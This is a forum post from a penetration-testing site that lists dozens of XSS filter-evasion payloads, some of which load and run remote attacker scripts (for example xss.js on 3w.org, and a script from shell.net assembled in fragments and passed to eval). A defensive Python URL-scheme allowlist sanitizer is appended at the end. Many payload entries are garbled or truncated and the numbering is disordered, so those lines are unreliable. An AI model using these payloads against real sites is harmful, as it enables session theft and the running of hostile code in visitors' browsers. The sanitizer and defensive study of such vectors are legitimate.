China Network Penetration Testing Alliance

Title: XSS Attack Roundup

Author: admin    Time: 2016-4-28 10:06
Title: XSS Attack Roundup
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters rarely work in China, as there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
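Nearly every IMG, LINK, BODY, TABLE and STYLE vector in this list defeats a filter that looks for the literal string javascript: and misses case changes, character references with or without semicolons, embedded tabs, newlines, carriage returns and null bytes, or leading control characters. The Python below is an added example, not code from the original post: it decodes a URL attribute value once, as an HTML parser would, strips the characters browsers ignore, and then accepts only an allowlisted scheme. ALLOWED_SCHEMES and the sample inputs are constructed for this example.

```python
import html
import re

# Added example: scheme allowlisting for URL-valued attributes (href, src,
# background, ...). ALLOWED_SCHEMES is a choice made for this example, not
# a value from the original post; sample inputs are constructed.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers drop tab/LF/CR anywhere in a URL and leading C0 controls/space.
# Stripping every C0 control and DEL from the scheme part is deliberately
# stricter than that, so the filter never disagrees with a lenient browser.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")
# RFC 3986 scheme shape: a letter followed by letters, digits, "+", "." or "-".
_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*$")


def extract_scheme(value: str) -> str:
    """Return the lower-cased scheme a browser would see, or "" if none.

    Character references are decoded once, because an HTML parser decodes
    an attribute value exactly once; numeric references are accepted with
    or without a trailing semicolon (&#106 and &#x6A; both become "j").
    """
    decoded = html.unescape(value)
    head, sep, _tail = decoded.partition(":")
    if not sep:
        return ""  # relative or protocol-relative URL: no scheme at all
    head = _CONTROL_WS.sub("", head).lower()
    # "/path?q=a:b" contains a colon but no scheme-shaped prefix.
    return head if _SCHEME_RE.match(head) else ""


def is_safe_url(value: str) -> bool:
    """Allowlist check: unknown schemes and script schemes are rejected."""
    scheme = extract_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES


def sanitize_src(value: str) -> str:
    """Attribute value to emit, or a harmless placeholder if rejected.

    The scheme check does not replace output encoding for the attribute
    context, so accepted values are still HTML-escaped here.
    """
    return html.escape(value, quote=True) if is_safe_url(value) else "#"
```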
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2